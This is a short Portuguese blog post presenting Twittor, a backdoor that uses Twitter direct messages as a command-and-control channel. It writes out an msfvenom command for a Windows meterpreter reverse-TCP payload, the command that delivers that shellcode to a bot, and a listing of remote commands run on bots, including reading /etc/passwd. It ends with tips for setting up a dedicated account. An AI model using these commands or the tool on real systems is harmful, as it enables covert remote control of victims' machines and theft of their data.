Twittor - Backdoor usando Twitter para C&C

Olá pessoal, nesse post venho falar mais uma vez sobre um backdoor com características de Command & Control, o Twittor.

Em um dos últimos posts, falei do GCat, que usa o Gmail, mas o Twittor utiliza-se de uma outra aplicação de rede social para C&C, o Twitter (nem dá para perceber pelo seu nome...rs). O que é mais interessante é que da mesma forma que para gerenciar o GCat poderíamos usar mensgaens de email, para o Twittor usamos Direct Messages (DM) para enviar os comandos que serão executados remotamente.

Você pode baixar o aplicativo AQUI ou saber mais sobre esse programa AQUI.

Uma das coisas que achei bem interessante é a possibilidade de executar comandos remotamente, incluindo shellcodes que vc tenha gerado pelo msfvenom do Metasploit. Por exemplo, se você gerar um shellcode usando o seguinte comando:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python

Basta enviar o shellcode criado com o seguinte comando, para o Twittor:

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)

O número 11:22:33:44:55 é o id do seu bot client, e você poderá saber quais comandos estão disponíveis após executar o servidor através do comando:

$ python twittor.py

E digitando "help":

$ help

E é interessante também saber como enviar comando codificados, com o comando:

$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Para saber quais bots estão ativos, basta executar:

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

Aqui vocês podem ver uma tela de configuração do Twittor:

E uma coisa muito importante: você precisa ter uma conta no Twitter para usá-lo...rs. Apenas certifique-se de criar uma conta exclusiva para isso, sejamos inteligentes ;-)

Por hoje é só!